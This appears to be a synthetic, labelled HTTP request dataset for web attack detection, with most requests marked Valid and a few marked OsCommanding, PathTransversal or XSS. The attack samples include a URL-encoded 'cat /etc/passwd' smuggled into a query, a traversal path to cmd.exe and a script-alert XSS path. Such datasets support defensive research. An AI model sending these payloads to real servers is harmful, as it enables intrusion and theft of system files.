UA-OS: Win95
UA-Color: color32
UA-Pixels: 7618x6392
Via: lehf/5.1 139.19.21.186:5, FTP/9.6 www.pxsoij7h.html:44, 9.9 21.223.62.234
Transfer-Encoding: deflate
Upgrade: 7pnrhe/1.7, tyytsb/2.7, rnTs/2.9, cgit/1.6, tek/9.5
Warning: 790 15.9.212.97 "Aeia" "Mon, 01 Mar 10 21:21:22 GMT"
X-Forwarded-For: 161.230.118.153
X-Serial-Number: 958943826904140
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15041
Start - Id: 43088
class: OsCommanding
GET /OpAle/y_Vz@Y/8QzET4_vB/sohzirmam.sh?nsra=t3&locationW0B3BId=mF1-Oui&meieG1l=%250acat+++%250a++++%2Fetc%2Fpasswd%250a&bUreplaceropen.@.=dseenydxeehnoSwiX&eBo1epmsat=iiEaobejennz+&fi0r4tadoIbi=rot8hDeysidw++ HTTP/1.0
Host: www.cn6h.st
Connection: tean
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: oT1jtElf-5lIr;q=0.9, sdnjde-a;q=0.7, hauen-roat9e4;q=0.3, ubmi-6uahimWm, Eiosoa-aUosl;q=0.8
Cache-Control: 9=vene
Client-ip: 177.244.249.24
Cookie: lkssdsTro=jxNhuWCs;aattvau=7anT;acTe0t0LaF=-aorcaHlrhgd7ue;xRp1k6fJTKG=c@Ri.bO0a;cwntDdh=yu$o;igsaoeena38ceoe=hFbm8h-XrG
Date: Sun, 02 Nov 08 04:45:04 CET
ETag: W/"as5zU3TltwGEc-Ix0hc"
If-Unmodified-Since: Sat, 06 May 06 24:30:20 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 843
Pragma: ient='i7'
Authorization: Basic YzJrcEVyOjdvZGVnYXNj
Referer: /cntre/Atu3h.cfm
TE: trailers
User-Agent: Mozilla/9.3 (X11; U; Linux i386 4.1; ty-gd; rv:8.5.6) Gecko/82351463
UA-OS: Mac OS X
Via: 9.3 116.85.239.108, 1.0 www.hhgdlr.gif, FTP/9.1 57.72.25.186

null

End - Id: 43088
Start - Id: 25512
class: Valid
GET /@N56LoH.Z.php4?foerunqaiel=7 HTTP/1.1
Host: 176.83.130.35
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 39.22.35.117
Cookie: eonttu=rtu:fnhhpwc4d;ie1eztsd=reanhmhesna;difgheteotewtu=5EapeT;;htaccesNR.=eEVj-f3kT;rtybzqlesd=maJ(
Cookie2: $Version="8"
Date: Tue, 02 Sep 08 09:47:36 UTC
ETag: W/"Yb_tx9yG@Ad7Oyq"
Expect: 100-continue
From: hhexy@ieecah.it
If-Modified-Since: Sun, 08 May 05 10:00:55 GMT
If-Unmodified-Since: Tue, 15 Feb 05 03:26:36 GMT
If-Match: *
If-None-Match: "UpW9V12Yu2HxC.QGj@E"
If-Range: *
Max-Forwards: 41
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM aWF0YWxzbmVtZ3EwZWl1MG5waXR3YXJkaXBIbm0wc3RuYmJhcnNlYnJjYg==
Authorization: Basic MHJkczp0dDFM
Range: 6-,950-89
Referer: /aygnht.nsf
TE: gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/0.9 (compatible; MSIE 1.7; Linux i386; 8r8nsaRUSo; uSjShrsn; oRntemSTf)
UA-CPU: x86
UA-Disp: 0020,943,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: HTTP/6.6 129.29.150.70, 4.7 www.eix8e.jpg, hle6tt/4.5 www.eEnn.js
Transfer-Encoding: compress
Upgrade: ftdTss/7.6
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 52901908993086938619
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25512
Start - Id: 34811
class: Valid
POST /aPjgu6xk.OTCXSsnpMHy/gaZ-z-gXQne@M./jyYBCM_ONOiiYlih/ohtaccesH/B98CNTsvl@OQ/lf7y4A@6X2BS./43OxfVO/tV.X5/7CS0/eomcllMO.nsf? HTTP/1.1
Content-Length: 289
Content-Language: rO,eouna4g
Content-Encoding: compress
Content-Location: http://www.tla2o.be/snnntht/pharupor/dj5rj/xv9nstd.png
Content-MD5: bFlubW5lcWFyaGVvc2xzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Apr 07 23:25:56 CET
Last-Modified: Fri, 28 Sep 07 20:23:39 UTC
Host: 168.222.160.64:80
Connection: ex2jhtp4
Accept: text/xml;q=0.5, text/*;q=0.8, audio/x-wav;q=0.6
Accept-Charset: x-mac-ce
Accept-Encoding: compress;q=0.0, identity;q=0.0, deflate;q=0.8, gzip
Accept-Language: dn2xL-tolnn;q=0.8, yaq-diE
Cache-Control: max-stale=678
Client-ip: 194.67.26.231
Cookie: jTlikeHMykfzZ=c<;tnruqusln=sQ34y@45XqA;ltud9=38518;wawdeplysn=16;9airq2=copyt5a
Cookie2: $Version="316"
Date: Sat, 30 Dec 06 13:26:37 UTC
ETag: "TtEjPjYMzmn3Pa0EH@rW"
Expect: 100-continue
From: erhtiA@esgifshqt.ch
If-Modified-Since: Sat, 17 May 08 02:55:01 GMT
If-Unmodified-Since: Mon, 17 Apr 06 23:59:19 UTC
If-Match: *
If-None-Match: "f4IW1pFH0Rv91Kpy"
If-Range: Fri, 09 Oct 09 08:32:01 UTC
Max-Forwards: 81
MIME-Version: 2.7
Pragma: mrkdnr=te
Proxy-Authorization: NTLM YXhhcGVFcW9vaXN0cm9tQWFlZXdzR3FvNGV1cndyaGRZbWVoRHUxdGxhb250aGlQ
Authorization: Basic YXdhTWlyYzplbWhvbHM5
Range: -74
Referer: http://Aeav6a.be/gveoniT/easjh/tUip/rhxgcst.jsp
TE: trailers
Trailer: Pragma
User-Agent: Nerla (9AFEfR; o6Yby0e; 0h_bJcX; oqbll81r; s.4IYJj9)
UA-CPU: Sparc
UA-Disp: 308,802,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 101x493
Via: HTTP/2.2 172.227.187.10:3, HTTP/9.0 171.226.110.80, 7.5 154.250.157.95
Transfer-Encoding: gzip
Upgrade: plgu/1.6
Warning: 507 208.255.183.240 "owchi" "Fri, 13 Oct 06 02:46:24 UTC"
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 01547887992852
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DY56fs=WtwnE&tac=n2&icaoeq=f@0nf95xUYg&eati2=ra7oarsz1eutatet&96eeleareate=taixuhg&20p3=t4eH vposition7htmpldocument+gs&el=cRi2rnefztdn3e&BCk6xX9=ve nnetcatrcpiqnenm&pAs6ELoamat=jwe &osi7wmaAwlCgkeh=1lterer&gvjFnGeBB=2Re$aiL-l&Csitaev2ru=tktot&iulartphandzc=1R_M&Ameahnet6=4885819632

End - Id: 34811
Start - Id: 34839
class: Valid
PUT /5@NmIpMitOY/1-9T67SZY5R8j1Qc0@6p/93/Un_zg/ymewaafcNnfn7cake/P7V0dRhNNU7AcchildY.tiff? HTTP/1.1
Content-Length: 283
Content-Language: mtrnghV
Content-Encoding: gzip
Content-Location: http://www.oNm9fsi.cz/7Doaoit.php4
Content-MD5: b2llb01KRHl0bm5ydGZyMA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Mar 08 08:46:00 GMT
Last-Modified: Tue, 09 Nov 04 02:18:06 GMT
Host: www.eEin.cz
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.1, identity, deflate;q=0.8, gzip;q=0.9, identity
Accept-Language: imHcwtNa-Hdet2, krEe-QgeA
Cache-Control: max-stale
Client-ip: 16.40.155.255
Cookie: dauayrrieedtoaa=awpv7Raq;eeentene6v=snl1waarl c1
Cookie2: $Version="351"
Date: Sat, 03 Mar 07 07:02:32 GMT
ETag: W/"7An7aeT8x-TeZUSw2"
Expect: 100-continue
From: RtMDosh@STsWZttr.de
If-Modified-Since: Sat, 12 Dec 09 14:37:59 CET
If-Unmodified-Since: Sat, 17 Feb 07 17:07:37 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Jun 05 23:44:18 UTC
Max-Forwards: 99
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest response="56FFddd048DB85AF437AF9E1cF7F3afc"
Authorization: NTLM ZnhiODV0YWVwbElkdHdXdXpxOVJjQm5pMHRIaXR3ZXRlYXJsNG5hZWw=
Range: 623768-8270,-361888,-69728
Referer: /nheh/ootgedr/o8y3s/iAaeil.mp3
TE: trailers,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: iWnktephsI http://www.9pdocyi6.de
UA-CPU: x86
UA-Disp: 9904,9912,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3246x5463
Via: FTP/2.8 80.252.43.46:1358
Transfer-Encoding: compress
Upgrade: xAqmi/0.2, o1hgea/4.1, rIdu/2.7, hori/6.4, 4dToph/6.1
Warning: 029 www.ldelcm.jpg "mt7u16ipeiusedskeu1" 
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 11691729475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hmMpaxld=vm'&iibihs=85&bzALyyY=it&yHuHygl=4458&Win=0526260&lBoescIolaas=enSsesnw2Dveo34t&awevneolpexyEes=m+os=tbn&y0Kwyw= nabfor&of5tejviersH0ir=rninonb1ie&eethsdfaw=ualriV2h ui3bh&wod=4140628&1mwmimIot=7500273&qstdin5etcFsbK1E=sqxz1i2nodeotbox&oerw=x1s&adaeognhsure05=anirpwra

End - Id: 34839
Start - Id: 44693
class: PathTransversal
PUT /eiidbseo1ReksRoI/af/RgijttoGet36yut2t3h/ptOErupkcs/kscriptE3.V0QD7TLHvbody/nordghtsoeiha6e1ourt/iGUVU1pLO/ateasbaCtfugitoay1/rPJyngW3PMY/8s87UJviiEUzR2ur.aspx? HTTP/1.1
Content-Length: 145
Content-Language: Ozfhp7
Content-Encoding: identity
Content-Location: http://www.rngieliy.be/icn6mtj/TeoAe/b3ol5tbe/hiC2/Lnck.cgi
Content-MD5: QXk2RmxQbmh1ZG9hbEdsaA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Jul 08 07:23:01 UTC
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: 150.241.150.138:80
Connection: QaEc2t
Accept: audio/*, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 219.190.204.229
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Mon, 08 Oct 07 24:31:32 CET
ETag: "RHf0qrb9mHL2t__f2YB"
Expect: saene=nf9tcCm
From: nC0otao@cuVsd.gov
If-Modified-Since: Fri, 02 Jul 04 24:37:04 CET
If-Unmodified-Since: Tue, 01 Dec 09 16:18:34 GMT
If-Match: *
If-None-Match: "SxwS.Y-e6CXloS1Q"
If-Range: *
Max-Forwards: 511
Pragma: no-cache
Authorization: NTLM OW5sczlldGxBaGYzY2luZWJmc3ZmZXRvcnl0bWRlMW9oeWE=
Range: 2168-,8-1607,73-
Referer: /netix3na/tteao/Iettwp.html
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Tng5Esft/2.7.9.7
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 136x0173
Via: 9.0 www.wq8egtn.jpeg:3069, Loaed/5.6 www.frdar.css
Transfer-Encoding: gzip
Upgrade: eeew/6.4, 8ei/8.8, dN4/7.3, mAm9/3.5
Warning: 868 www.gmor.js "Hn5xrhit" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ---------------------------------------------

nnxtwzrh1e2lmk=58&wwngt9SamTt=ehosrLaqg&inientc2n4FEm=llg1&bodyCfFvPLIGhomeOz=ht&proe7e=file:///1:/d1/9nl/1edahee.xml&tl=ba6Qmejn

End - Id: 44693
Start - Id: 10574
class: Valid
GET /p@RBdfA/VlogYHWAoqqchildadmin4Sz/tXIIixeBOBJfCfkl6Cy.tiff?Yaaoi=yCrtlsar&ersowiyw=systemtn%29%3F5tap+vvarm&nY6tE0=iauRpIYZ5-&tper=et&ritonewtiaspOn=e&Trel8eswdP=ymVVL HTTP/1.0
Host: 168.75.89.86:44
Connection: keep-alive
Accept: application/*;q=0.4, application/*;q=0.4, application/*
Accept-Charset: x-mac-greek;q=0.6, isiri-3342;q=0.6, euc-jp
Accept-Encoding: 
Accept-Language: E97-mln;q=0.8, espoouO-oxeet
Cache-Control: only-if-cached
Client-ip: 120.227.221.236
Cookie: sisvi9Uape5=rZX-dmnOV9;9cyae=oXwdmseitahosclZy;I6flike=ibAlnm4rLS;ga=i@etsock_stream
Cookie2: $Version="56"
Date: Sat, 01 Dec 07 18:41:45 GMT
ETag: W/"ERAXGjzgXLEKLnGXtoz"
Expect: 100-continue
From: lienea@fkubr8mmw0.cz
If-Modified-Since: Mon, 10 Apr 06 16:19:53 CET
If-Unmodified-Since: Thu, 08 Jul 04 18:55:53 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2216
MIME-Version: 6.8
Pragma: b='ce4Tt'
Proxy-Authorization: Basic ZWVuZGhlMzp5bXVzZw==
Authorization: vdox nkhym7i=nothy5
Range: 13113-277,3-670,8449-3
Referer: http://E4oi.be/0urle/Adtan7A/rtg8iwu/meis.asp
TE: trailers,chunked,deflate
Trailer: TE
User-Agent: Mozilla/1.5 (Windows; U; Win 9x 4.6; li-eb; rv:9.8.6) Gecko/63029891
UA-CPU: PowerPC
UA-Disp: 942,3967,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2627x335
Via: 8.2 www.sf7at.css:7, 2.1 www.vqWtIO.tiff, 2.5 0.60.32.88
Transfer-Encoding: compress
Upgrade: uietn/2.4
Warning: 512 13.143.191.178:1 "gLnswk" 
X-Forwarded-For: 109.176.189.188
X-Serial-Number: 72395720
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10574
Start - Id: 46536
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.1
Host: 234.220.35.242:80
Connection: keep-alive
Accept: audio/x-wav, application/postscript
Accept-Charset: hz-gb-2312;q=0.8
Accept-Encoding: 
Accept-Language: 3piar-z6
Cache-Control: max-age=592
Client-ip: 252.144.87.30
Cookie: srnblaIaksxt=1823
Cookie2: $Version="896"
Date: Fri, 25 Jul 08 13:25:07 CET
ETag: "aNVJT2lKpqFCO9DMA"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Sat, 17 Jun 06 14:41:02 UTC
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "9oYjg2GYAoSOmeeT-f"
If-None-Match: "8L9FnjWtU@u@r@3g7l.c"
If-Range: *
Max-Forwards: 89
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM YVNldHQ0aEVhZXduaDNDaWM5ZGdlOWNlU3BwZXBlcmFhcA==
Authorization: nr1ti raeureu=fttsc
Range: 545941-
Referer: http://www.igt2ek.net/eealate/diua0xhc.png
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 6.8; de-1s; rv:1.1.1) Gecko/17180982
UA-CPU: x86
UA-Disp: 9426,1336,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 139x000
Via: 7.4 117.219.123.115, 7.9 www.9yyoe.jpeg
Transfer-Encoding: gzip
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46536
Start - Id: 5381
class: Valid
PUT /jDLyDT_Vws6szqg/-CmStonhomeL/selectJPbodyMnjl.sh? HTTP/1.0
Content-Length: 73
Content-Language: Lritam,e
Content-Encoding: deflate
Content-Location: /bint/sarp/h9Nl/tiaalle/aRrdap.gif
Content-MD5: b3AzdGU3aXRzaHJjcnQ5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Dec 04 10:35:07 CET
Last-Modified: Thu, 27 Apr 06 14:41:40 UTC
Host: 27.200.203.11
Connection: nwmyo
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 127.31.233.225
Cookie: suop=149772;og=62386;tap89nxrd3=574253233;BconnecthEU0-1=wDl
Cookie2: $Version="21"
Date: Mon, 24 May 04 04:32:38 UTC
ETag: "KpoJdC8IOHh0PCG"
Expect: rftTqE=eUtiR;Fnmuttp
From: nojeamee@zitf6g.it
If-Modified-Since: Mon, 11 Apr 05 06:27:16 CET
If-Unmodified-Since: Tue, 13 Jul 04 13:27:06 CET
If-Match: "u_mPjut.5FG@coOJUo"
If-None-Match: *
If-Range: Thu, 29 Oct 09 21:43:37 UTC
Max-Forwards: 8
MIME-Version: 9.7
Pragma: haou9nLh='tg'
Proxy-Authorization: hjrb rneuidoi=tA3pN
Authorization: fes3 ohat=hztlna
Range: 429-04732,0-0702,6-47430
Referer: /aetj1.gif
TE: gzip;q=0.9
Trailer: Pragma
User-Agent: Mozilla/6.0 (X11; U; Open BSD i586 4.1; lS-na; rv:3.7.0) Gecko/90697654
UA-CPU: x86
UA-Disp: 725,766,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 237x186
Via: 5.1 209.69.61.142:72, 3.6 www.0etHD.tiff:6, 3.0 www.Pannt.png
Transfer-Encoding: gzip
Upgrade: m4rr/9.8, leutb/5.3, pbd/7.7
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 72.151.254.224
X-Serial-Number: 028740747069773
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

udiafhHnir=1cd%tSs4&RbodyLQxml=rEe&yuLo=osxtdnegt&Hreplacee594poS9q=>

End - Id: 5381
Start - Id: 20175
class: Valid
GET /haRoaaosyrnErf/IlfEho/ciewhnemqhrEramotn/GTlinkX8-g/aAepVG_StYEnGeD/yEDwt4tOc/ejBSMB.v.Tp/cpHh_qhWK90VfLO1.png?hzo3s1earot=uNcopy&tktc4iytpaa=571&dtBaa=hm3&e1tenttl=942185&nosuimPohrdkcJ=8676&stqdtsattftikf9=ai52nyreatthsyoE&nEg07jebhveoih=eretczachmsales0b&xt=3&oA876si=%40&bceob=codha27w&tDeEm=72968&cie0sse=pikVK7VG9wc5&rprowo=pdstanze0i8fei HTTP/1.1
Host: www.eJ3sneh.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rotWS-t;q=0.6, tieK-otizpaa, Ahg-iiHciou;q=0.8, smedaer-tety, rh0eni-aerEt
Cache-Control: only-if-cached
Client-ip: 214.165.147.24
Cookie: Grtw2=0702559;ey4lnpaqtexsn=32384;3F=hskyM;andbgsound4bZb=Nalpkernteoteuil
Cookie2: $Version="9"
Date: Sat, 07 Oct 06 08:12:17 UTC
ETag: "yutrOeQr0.Ij3Isszj5Y"
Expect: n5mbdad
From: eosoO@enstol2ni.de
If-Modified-Since: Mon, 10 Apr 06 06:54:20 UTC
If-Unmodified-Since: Sat, 18 Oct 08 14:09:52 UTC
If-Match: "wf1rGbtsRxubkHA4WD."
If-None-Match: "_k.@0osY@IAoIrVn"
If-Range: "G7s3D8YOzjLf4OF2S4"
Max-Forwards: 1600
MIME-Version: 4.6
Pragma: ecMactc='d1v2mzrA'
Proxy-Authorization: Digest nonce
Authorization: Digest username="eliuoo"
Range: 365749-,607-065
Referer: /iiattr0e/earswnsa/doe3mae/Oae7.swf
TE: trailers
Trailer: TE
User-Agent: Mozilla/3.8 (Machintosh; U; Mac OS X 7.3; sn-py; rv:0.5.7) Gecko/32870656
UA-CPU: 68000
UA-Disp: 909,081,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 199x535
Via: 1.4 148.150.10.76, 1l8nIS/4.5 156.121.87.9
Transfer-Encoding: identity
Upgrade: oieit/1.6, oam/2.4, hter/6.0, edl/2.6, anna/8.1
Warning: 651 88.213.252.125:060 "5sir4foalundnc" "Thu, 24 Mar 05 09:39:40 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 818940289037897740
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20175
Start - Id: 25526
class: Valid
GET /tHutDra4Zz/rdiaetsrUocirb/vtmy/ic.cgi? HTTP/1.1
Host: www.irtna.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, gzip, identity, gzip
Accept-Language: be1uIzgN-usy;q=0.2, lbeajor-eto;q=0.4
Cache-Control: max-age=6442
Client-ip: 48.113.165.204
Cookie: u8fatea=u%;3tiefiumpi5=55823967;te8=0531
Cookie2: $Version="39"
Date: Thu, 17 Jul 08 06:07:30 UTC
ETag: W/"9gnxzhim.JJgvyVvjd"
Expect: 100-continue
From: osil@wYub.gov
If-Modified-Since: Sun, 26 Oct 08 11:18:16 GMT
If-Unmodified-Since: Fri, 26 Dec 08 03:06:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1109
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic bm9yZzFyOm93c28=
Authorization: NTLM aWF5c2VuZWkxdXVxODc4bWx3bGFsRWFzcmVvODNvNWNjaXI4d3RlaXNmNzFuZw==
Range: 667-742
Referer: /ii7c9lEH/zdort/tAhoys.nsf
TE: gzip;q=0.9,trailers,chunked;q=0.8
Trailer: Date
User-Agent: Mozilla/8.8 (X11; U; Solaris 6.6; ar-vo; rv:6.6.1) Gecko/33019206
UA-CPU: MIPS
UA-Disp: 0020,943,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5796x493
Via: HTTP/5.6 118.114.225.149:693
Transfer-Encoding: compress
Upgrade: utH/5.0, httwz/8.8, luydy/3.7, rLo/1.4, iool1/1.7
Warning: 111 118.94.67.31 "uxakonOyb" "Mon, 04 Oct 04 19:54:01 UTC"
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 9918504
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25526
Start - Id: 44529
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 150.227.103.250
Connection: s9ia
Accept: application/postscript
Accept-Charset: iso-8859-4, koi8-r;q=0.6, iso-8859-4, x-mac-korean;q=0.1
Accept-Encoding: *
Accept-Language: gbmaT-toh, rRbsroy-ar;q=0.2
Cache-Control: only-if-cached
Cookie: atswae=enhisto'Tnth;ISlhjhpyrale8=jewSsobject8~e9
Date: Mon, 13 Apr 09 22:53:57 GMT
ETag: W/"pik_981fbQAX0z-QQeD"
Expect: rhea
If-None-Match: *
If-Range: Wed, 03 Oct 07 01:12:42 UTC
Max-Forwards: 01
Pragma: no-cache
Authorization: Digest response="208F600d95D2dDe4DB8BB5BaA6EEC86a"
Referer: /esYCn4a/NelUt/ede4dlz/rOra.sh
TE: trailers
Trailer: TE
User-Agent: Mozilla/4.2 (compatible; Konqueror/7.8; Mac OS X; iz9w)
UA-Disp: 681,3359,16
Via: FTP/4.7 40.137.67.88
Transfer-Encoding: compress

null

End - Id: 44529
Start - Id: 19259
class: Valid
GET /ttxnnuor/iBfOpa/gg/siall4nceha7nel6l9t/reeitr/ejx1dRg0xPBvEr.pl?sy2decps6oh6=2086933&uHntemukres=tAiibthashiito&cIurtbxal9l=sa&Ydsta0tgXityEG=299010&ksrh=wAwQj&hZs=TesyeqOotoptibgsoundr&wbrgrtefseeu=%27i7rt&BungqtM03gueoll=ai%24th2eanoqgstylege&aIdi50RCetefw0u=passwdir+oe9n%7E%5Bha%3F&U4_P86=ietRehpt3ln&yioutsh=01&Rl6VHrcp2N=aaoj8FAB&PwWKKhpadmin=svtvep2oat7if HTTP/1.0
Host: www.aseg2gio.biz
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: pe-gd
Cache-Control: only-if-cached
Client-ip: 119.151.125.177
Cookie: ehaaj71trOe8ecy=17;eeoiDd8SOeptDi=1ielocation2<in s ce5;MA1-Bw.V=998291;i5oaaf6e=rm.uQDXtfRB-
Cookie2: $Version="1"
Date: Sun, 29 May 05 04:18:37 CET
ETag: "twZD0qng9VYSvsGq7"
Expect: sti5tt=rtadtD;tngt=2zhi
From: eihFze1l@giUuEnH.gov
If-Modified-Since: Sun, 01 Feb 04 13:39:51 GMT
If-Unmodified-Since: Thu, 21 Feb 08 13:10:30 CET
If-Match: *
If-None-Match: "43K3@@nIN7op0Q6H"
If-Range: *
Max-Forwards: 44
MIME-Version: 5.9
Pragma: i6eUre=Tpn6
Proxy-Authorization: Basic cG5ucnlsOmV3ZXNlY2Fp
Authorization: Basic c21haW5udDpyc3NGbA==
Range: -9624,44-
Referer: http://Ni90h.net/ohrls/senaw85c.cfm
TE: deflate;q=0.4,deflate;q=0.4,gzip
Trailer: If-Range
User-Agent: Mozilla/8.6 (X11; U; Open BSD i386 9.4; en-cq; rv:6.6.2) Gecko/17260795
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3141x1930
Via: FTP/8.3 135.108.164.213, 7.8 www.4opf.gif:13484
Transfer-Encoding: identity
Upgrade: hi5nal/8.0, hn5t/9.2, ykhito/3.3, 43fett/7.0, nnahn/6.1
Warning: 189 www.bfnra.jpeg "oioun" "Fri, 06 Apr 07 09:26:10 UTC"
X-Forwarded-For: 188.199.45.53
X-Serial-Number: 9449632282194907610
----: --------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 19259
Start - Id: 24122
class: Valid
GET /crhrrydrm/aYEbZMbMUe/h7VLPMkJTWcxU_k/prmrironhvc/4Fmocha/q4eu/eoc9qaitunbEl.php?1eju=5615&rUHSpositionkp=usms3sde&sQh6hfltSaGe=+&aoe=dsm5juwnosiht&casptu2eSonmd=mvssr%2Frlx52ATn&dJi7urideerferr=0397&p4sae5t7weo=+y&crIoeaoobnWe=t%40eatsdxo%7Ce%27iS HTTP/1.1
Host: www.e4Mam.fr
Connection: keep-alive
Accept: audio/x-wav, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity, deflate;q=0.2, compress, identity;q=0.0
Accept-Language: ttr-epEch;q=0.6, co-aeg;q=0.8, gm3e-q0t
Cache-Control: no-store
Client-ip: 161.43.125.4
Cookie: elrrt=eedDenfxhoe2Hstdinh;oaLBhLuS=W;nksattlvew3ct=bnrNNkWt;nHx=23;ixesltatNni7y=le5=ofVezi2z2meta
Cookie2: $Version="9"
Date: Tue, 30 Jun 09 15:10:28 GMT
ETag: "4ri71OPitKuyaAI1"
Expect: 100-continue
From: ea2rrnra@4ot0po.be
If-Modified-Since: Fri, 13 Feb 04 20:45:27 UTC
If-Unmodified-Since: Tue, 22 Apr 08 16:48:45 CET
If-Match: *
If-None-Match: "Kbq8mjABJxzv_uMF8MO"
If-Range: Tue, 25 May 04 14:18:02 GMT
Max-Forwards: 12
MIME-Version: 1.3
Pragma: e56i7='w2eolteo'
Proxy-Authorization: Digest nonce
Authorization: rephn 9uuqEn=draec
Range: -293,9-
Referer: /rsr7uuc/ptara/rreey5rv/rsy8eize/sorEn.jpg
TE: gzip,deflate;q=0.2
Trailer: Trailer
User-Agent: bunrrmsb (a8exxK9Qi)
UA-CPU: StrongARM
UA-Disp: 3355,078,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 109x7677
Via: HTTP/9.3 www.dd3r.js, 3.6 80.39.173.17, 8.5 www.ehnGshaa.css
Transfer-Encoding: compress
Upgrade: hlnn4/1.8
Warning: 382 www.ni2t.htm "ztadtttA6sydiidea" "Fri, 07 Jan 05 08:48:11 CET"
X-Forwarded-For: 33.216.101.183
X-Serial-Number: 98139157905
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24122
Start - Id: 10826
class: Valid
GET /WMZ.YSBzONpRAC/nantRawcCsfeea.gif?rh=1899483&kldvaYaasmeyiub=ptuextermd8%2Beolssm&Klocation2K_R5=e8daodA&fftntblh=er2%27&htnt68sz=7sajEui&XAHpasswd1yf-=7056600&I-0s=7836379&G-X9=16 HTTP/1.1
Host: 98.179.255.15:80
Connection: osyttzui
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: f-kAvis, kts-aN
Cache-Control: no-cache
Client-ip: 59.172.56.164
Cookie: gW@wIV=h-Kij0kJLz;ostarNai34nvtt=esh;apvcRaguacnm=548823
Cookie2: $Version="9"
Date: Sat, 20 Feb 10 10:45:42 CET
ETag: W/"EAJK8SGgzYLV1svwviMA"
Expect: 100-continue
From: efCk@raAE5teBT.uk
If-Modified-Since: Mon, 30 Jun 08 11:02:18 CET
If-Unmodified-Since: Wed, 18 Feb 04 15:30:06 CET
If-Match: "BYz0FzuRmQtz5pB"
